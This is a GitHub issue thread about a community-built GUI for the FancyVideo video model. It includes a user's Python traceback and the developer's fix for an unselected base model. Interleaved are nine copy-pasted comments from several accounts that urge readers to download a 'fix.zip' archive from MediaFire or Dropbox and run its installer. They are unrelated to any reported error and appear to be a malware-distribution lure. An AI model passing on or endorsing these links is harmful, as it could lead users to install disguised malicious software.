### ISSUE TITLE
Full interface gui

### ISSUE THREAD

**Issue by AA-Developer** [360CVGroup/FancyVideo#11]
I made a complete interface check it out
https://github.com/AA-Developer/FancyVideo/tree/main
If there are any errors, tell me. Knowing that I have tested it a lot and have not encountered any problems.
I will add lora file support when I have time.

![screencapture-0](https://github.com/user-attachments/assets/2d0a62aa-7833-4991-8638-162ea1f6ecce)

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by TryingToDoBetter25** [comment]
> > ![微信截图_20240826210000](https://private-user-images.githubusercontent.com/96119579/361440412-8360e46a-659d-43e3-a5a2-4c3689cee3b9.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2OTA3NzIsIm5iZiI6MTcyNDY5MDQ3MiwicGF0aCI6Ii85NjExOTU3OS8zNjE0NDA0MTItODM2MGU0NmEtNjU5ZC00M2UzLWE1YTItNGMzNjg5Y2VlM2I5LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI2VDE2NDExMlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTMxZTgxYjhjNWJmYTQxNWNlMTdlOTMyMzc2NzQwOGE1NTAyZmNhODBiMzk2ZmIwOGE3MTYxMGZiNjA3MjA4ODMmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.u9vBiksKSZ8wlI-02eYQEjiRQnZo21a9XH8gaG3sft4) I have encountered this problem, does anyone know how to solve it？
> 
> hi The text is not clear Copy the entire error and send it as text or in a text file.


(F:\1AI\FancyVideo\FancyVideo\aiyy.info) F:\1AI\FancyVideo\FancyVideo>python app.py
F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\gradio\components\dropdown.py:188: UserWarning: The value passed into gr.Dropdown() is not in the list of choices. Please update the list of choices to include:  or set allow_custom_value=True.
  warnings.warn(
Running on local URL:  http://127.0.0.1:7860

To create a public link, set `share=True` in `launch()`.
ERROR:    Exception in ASGI application
Traceback (most recent call last):
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\uvicorn\protocols\http\h11_impl.py", line 406, in run_asgi
    result = await app(  # type: ignore[func-returns-value]
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\uvicorn\middleware\proxy_headers.py", line 70, in __call__
    return await self.app(scope, receive, send)
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\fastapi\applications.py", line 1054, in __call__
    await super().__call__(scope, receive, send)
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\applications.py", line 123, in __call__
    await self.middleware_stack(scope, receive, send)
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\middleware\errors.py", line 186, in __call__
    raise exc
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\middleware\errors.py", line 164, in __call__
    await self.app(scope, receive, _send)
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\gradio\route_utils.py", line 760, in __call__
    await self.app(scope, receive, send)
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\middleware\exceptions.py", line 65, in __call__
    await wrap_app_handling_exceptions(self.app, conn)(scope, receive, send)
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\_exception_handler.py", line 64, in wrapped_app
    raise exc
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\_exception_handler.py", line 53, in wrapped_app
    await app(scope, receive, sender)
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\routing.py", line 754, in __call__
    await self.middleware_stack(scope, receive, send)
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\routing.py", line 774, in app
    await route.handle(scope, receive, send)
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\routing.py", line 295, in handle
    await self.app(scope, receive, send)
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\routing.py", line 77, in app
    await wrap_app_handling_exceptions(app, request)(scope, receive, send)
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\_exception_handler.py", line 64, in wrapped_app
    raise exc
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\_exception_handler.py", line 53, in wrapped_app
    await app(scope, receive, sender)
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\routing.py", line 75, in app
    await response(scope, receive, send)
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\responses.py", line 348, in __call__
    await send(
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\_exception_handler.py", line 50, in sender
    await send(message)
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\_exception_handler.py", line 50, in sender
    await send(message)
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\middleware\errors.py", line 161, in _send
    await send(message)
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\uvicorn\protocols\http\h11_impl.py", line 503, in send
    output = self.conn.send(event=h11.Data(data=data))
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\h11\_connection.py", line 512, in send
    data_list = self.send_with_data_passthrough(event)
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\h11\_connection.py", line 545, in send_with_data_passthrough
    writer(event, data_list.append)
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\h11\_writers.py", line 65, in __call__
    self.send_data(event.data, write)
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\h11\_writers.py", line 91, in send_data
    raise LocalProtocolError("Too much data for declared Content-Length")
h11._util.LocalProtocolError: Too much data for declared Content-Length
Traceback (most recent call last):
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\gradio\queueing.py", line 536, in process_events
    response = await route_utils.call_process_api(
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\gradio\route_utils.py", line 321, in call_process_api
    output = await app.get_blocks().process_api(
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\gradio\blocks.py", line 1935, in process_api
    result = await self.call_function(
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\gradio\blocks.py", line 1520, in call_function
    prediction = await anyio.to_thread.run_sync(  # type: ignore
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\anyio\to_thread.py", line 56, in run_sync
    return await get_async_backend().run_sync_in_worker_thread(
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\anyio\_backends\_asyncio.py", line 2177, in run_sync_in_worker_thread
    return await future
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\anyio\_backends\_asyncio.py", line 859, in run
    result = context.run(func, *args)
  File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\gradio\utils.py", line 826, in wrapper
    response = f(*args, **kwargs)
  File "F:\1AI\FancyVideo\FancyVideo\app.py", line 144, in image_to_video
    return run_inference("i2v", settings=settings, image=image, text_prompt=text_prompt, common_negative_prompt=common_negative_prompt, resolution=resolution, base_model_file=base_model_file, use_fps_embedding=use_fps_embedding, use_motion_embedding=use_motion_embedding, video_length=video_length, output_fps=output_fps, cond_fps=cond_fps, cond_motion_score=cond_motion_score, use_noise_scheduler_snr=use_noise_scheduler_snr, seed=seed)
  File "F:\1AI\FancyVideo\FancyVideo\app.py", line 77, in run_inference
    base_model_path=base_model_path,
UnboundLocalError: local variable 'base_model_path' referenced before assignment

**Comment by AA-Developer** [comment]
> > > ![微信截图_20240826210000](https://private-user-images.githubusercontent.com/96119579/361440412-8360e46a-659d-43e3-a5a2-4c3689cee3b9.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2OTA3NzIsIm5iZiI6MTcyNDY5MDQ3MiwicGF0aCI6Ii85NjExOTU3OS8zNjE0NDA0MTItODM2MGU0NmEtNjU5ZC00M2UzLWE1YTItNGMzNjg5Y2VlM2I5LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI2VDE2NDExMlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTMxZTgxYjhjNWJmYTQxNWNlMTdlOTMyMzc2NzQwOGE1NTAyZmNhODBiMzk2ZmIwOGE3MTYxMGZiNjA3MjA4ODMmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.u9vBiksKSZ8wlI-02eYQEjiRQnZo21a9XH8gaG3sft4) I have encountered this problem, does anyone know how to solve it？
> > 
> > 
> > hi The text is not clear Copy the entire error and send it as text or in a text file.
> 
> (F:\1AI\FancyVideo\FancyVideo\aiyy.info) F:\1AI\FancyVideo\FancyVideo>python app.py F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\gradio\components\dropdown.py:188: UserWarning: The value passed into gr.Dropdown() is not in the list of choices. Please update the list of choices to include: or set allow_custom_value=True. warnings.warn( Running on local URL: http://127.0.0.1:7860
> 
> To create a public link, set `share=True` in `launch()`. ERROR: Exception in ASGI application Traceback (most recent call last): File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\uvicorn\protocols\http\h11_impl.py", line 406, in run_asgi result = await app( # type: ignore[func-returns-value] File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\uvicorn\middleware\proxy_headers.py", line 70, in **call** return await self.app(scope, receive, send) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\fastapi\applications.py", line 1054, in **call** await super().**call**(scope, receive, send) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\applications.py", line 123, in **call** await self.middleware_stack(scope, receive, send) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\middleware\errors.py", line 186, in **call** raise exc File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\middleware\errors.py", line 164, in **call** await self.app(scope, receive, _send) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\gradio\route_utils.py", line 760, in **call** await self.app(scope, receive, send) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\middleware\exceptions.py", line 65, in **call** await wrap_app_handling_exceptions(self.app, conn)(scope, receive, send) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette_exception_handler.py", line 64, in wrapped_app raise exc File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette_exception_handler.py", line 53, in wrapped_app await app(scope, receive, sender) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\routing.py", line 754, in **call** await self.middleware_stack(scope, receive, send) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\routing.py", line 774, in app await route.handle(scope, receive, send) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\routing.py", line 295, in handle await self.app(scope, receive, send) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\routing.py", line 77, in app await wrap_app_handling_exceptions(app, request)(scope, receive, send) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette_exception_handler.py", line 64, in wrapped_app raise exc File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette_exception_handler.py", line 53, in wrapped_app await app(scope, receive, sender) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\routing.py", line 75, in app await response(scope, receive, send) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\responses.py", line 348, in **call** await send( File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette_exception_handler.py", line 50, in sender await send(message) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette_exception_handler.py", line 50, in sender await send(message) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\middleware\errors.py", line 161, in _send await send(message) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\uvicorn\protocols\http\h11_impl.py", line 503, in send output = self.conn.send(event=h11.Data(data=data)) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\h11_connection.py", line 512, in send data_list = self.send_with_data_passthrough(event) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\h11_connection.py", line 545, in send_with_data_passthrough writer(event, data_list.append) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\h11_writers.py", line 65, in **call** self.send_data(event.data, write) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\h11_writers.py", line 91, in send_data raise LocalProtocolError("Too much data for declared Content-Length") h11._util.LocalProtocolError: Too much data for declared Content-Length Traceback (most recent call last): File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\gradio\queueing.py", line 536, in process_events response = await route_utils.call_process_api( File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\gradio\route_utils.py", line 321, in call_process_api output = await app.get_blocks().process_api( File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\gradio\blocks.py", line 1935, in process_api result = await self.call_function( File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\gradio\blocks.py", line 1520, in call_function prediction = await anyio.to_thread.run_sync( # type: ignore File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\anyio\to_thread.py", line 56, in run_sync return await get_async_backend().run_sync_in_worker_thread( File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\anyio_backends_asyncio.py", line 2177, in run_sync_in_worker_thread return await future File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\anyio_backends_asyncio.py", line 859, in run result = context.run(func, *args) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\gradio\utils.py", line 826, in wrapper response = f(*args, **kwargs) File "F:\1AI\FancyVideo\FancyVideo\app.py", line 144, in image_to_video return run_inference("i2v", settings=settings, image=image, text_prompt=text_prompt, common_negative_prompt=common_negative_prompt, resolution=resolution, base_model_file=base_model_file, use_fps_embedding=use_fps_embedding, use_motion_embedding=use_motion_embedding, video_length=video_length, output_fps=output_fps, cond_fps=cond_fps, cond_motion_score=cond_motion_score, use_noise_scheduler_snr=use_noise_scheduler_snr, seed=seed) File "F:\1AI\FancyVideo\FancyVideo\app.py", line 77, in run_inference base_model_path=base_model_path, UnboundLocalError: local variable 'base_model_path' referenced before assignment

The problem is that you did not specify a model to use in Select Base Model.
In case you did not enter any value I have created a custom code for your problem that uses a model.
use app.py in this link
https://github.com/AA-Developer/FancyVideo/tree/fix

**Comment by TryingToDoBetter25** [comment]
> > > > ![微信截图_20240826210000](https://private-user-images.githubusercontent.com/96119579/361440412-8360e46a-659d-43e3-a5a2-4c3689cee3b9.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2OTA3NzIsIm5iZiI6MTcyNDY5MDQ3MiwicGF0aCI6Ii85NjExOTU3OS8zNjE0NDA0MTItODM2MGU0NmEtNjU5ZC00M2UzLWE1YTItNGMzNjg5Y2VlM2I5LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI2VDE2NDExMlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTMxZTgxYjhjNWJmYTQxNWNlMTdlOTMyMzc2NzQwOGE1NTAyZmNhODBiMzk2ZmIwOGE3MTYxMGZiNjA3MjA4ODMmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.u9vBiksKSZ8wlI-02eYQEjiRQnZo21a9XH8gaG3sft4) I have encountered this problem, does anyone know how to solve it？
> > > 
> > > 
> > > hi The text is not clear Copy the entire error and send it as text or in a text file.
> > 
> > 
> > (F:\1AI\FancyVideo\FancyVideo\aiyy.info) F:\1AI\FancyVideo\FancyVideo>python app.py F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\gradio\components\dropdown.py:188: UserWarning: The value passed into gr.Dropdown() is not in the list of choices. Please update the list of choices to include: or set allow_custom_value=True. warnings.warn( Running on local URL: http://127.0.0.1:7860
> > To create a public link, set `share=True` in `launch()`. ERROR: Exception in ASGI application Traceback (most recent call last): File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\uvicorn\protocols\http\h11_impl.py", line 406, in run_asgi result = await app( # type: ignore[func-returns-value] File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\uvicorn\middleware\proxy_headers.py", line 70, in **call** return await self.app(scope, receive, send) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\fastapi\applications.py", line 1054, in **call** await super().**call**(scope, receive, send) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\applications.py", line 123, in **call** await self.middleware_stack(scope, receive, send) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\middleware\errors.py", line 186, in **call** raise exc File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\middleware\errors.py", line 164, in **call** await self.app(scope, receive, _send) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\gradio\route_utils.py", line 760, in **call** await self.app(scope, receive, send) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\middleware\exceptions.py", line 65, in **call** await wrap_app_handling_exceptions(self.app, conn)(scope, receive, send) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette_exception_handler.py", line 64, in wrapped_app raise exc File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette_exception_handler.py", line 53, in wrapped_app await app(scope, receive, sender) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\routing.py", line 754, in **call** await self.middleware_stack(scope, receive, send) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\routing.py", line 774, in app await route.handle(scope, receive, send) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\routing.py", line 295, in handle await self.app(scope, receive, send) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\routing.py", line 77, in app await wrap_app_handling_exceptions(app, request)(scope, receive, send) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette_exception_handler.py", line 64, in wrapped_app raise exc File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette_exception_handler.py", line 53, in wrapped_app await app(scope, receive, sender) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\routing.py", line 75, in app await response(scope, receive, send) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\responses.py", line 348, in **call** await send( File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette_exception_handler.py", line 50, in sender await send(message) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette_exception_handler.py", line 50, in sender await send(message) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\starlette\middleware\errors.py", line 161, in _send await send(message) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\uvicorn\protocols\http\h11_impl.py", line 503, in send output = self.conn.send(event=h11.Data(data=data)) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\h11_connection.py", line 512, in send data_list = self.send_with_data_passthrough(event) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\h11_connection.py", line 545, in send_with_data_passthrough writer(event, data_list.append) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\h11_writers.py", line 65, in **call** self.send_data(event.data, write) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\h11_writers.py", line 91, in send_data raise LocalProtocolError("Too much data for declared Content-Length") h11._util.LocalProtocolError: Too much data for declared Content-Length Traceback (most recent call last): File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\gradio\queueing.py", line 536, in process_events response = await route_utils.call_process_api( File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\gradio\route_utils.py", line 321, in call_process_api output = await app.get_blocks().process_api( File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\gradio\blocks.py", line 1935, in process_api result = await self.call_function( File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\gradio\blocks.py", line 1520, in call_function prediction = await anyio.to_thread.run_sync( # type: ignore File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\anyio\to_thread.py", line 56, in run_sync return await get_async_backend().run_sync_in_worker_thread( File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\anyio_backends_asyncio.py", line 2177, in run_sync_in_worker_thread return await future File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\anyio_backends_asyncio.py", line 859, in run result = context.run(func, *args) File "F:\1AI\FancyVideo\FancyVideo\aiyy.info\lib\site-packages\gradio\utils.py", line 826, in wrapper response = f(*args, **kwargs) File "F:\1AI\FancyVideo\FancyVideo\app.py", line 144, in image_to_video return run_inference("i2v", settings=settings, image=image, text_prompt=text_prompt, common_negative_prompt=common_negative_prompt, resolution=resolution, base_model_file=base_model_file, use_fps_embedding=use_fps_embedding, use_motion_embedding=use_motion_embedding, video_length=video_length, output_fps=output_fps, cond_fps=cond_fps, cond_motion_score=cond_motion_score, use_noise_scheduler_snr=use_noise_scheduler_snr, seed=seed) File "F:\1AI\FancyVideo\FancyVideo\app.py", line 77, in run_inference base_model_path=base_model_path, UnboundLocalError: local variable 'base_model_path' referenced before assignment
> 
> The problem is that you did not specify a model to use in Select Base Model. In case you did not enter any value I have created a custom code for your problem that uses a model. use app.py in this link https://github.com/AA-Developer/FancyVideo/tree/fix
> 
> Also make sure that the required Models are in the Models path to use them.

Excellent work, it worked. Thank you very much.

**Comment by ibrainventures** [comment]
WOW ! Thank you .. that was on my own to-do list .. so .. thank you very much, i will take a look next week.
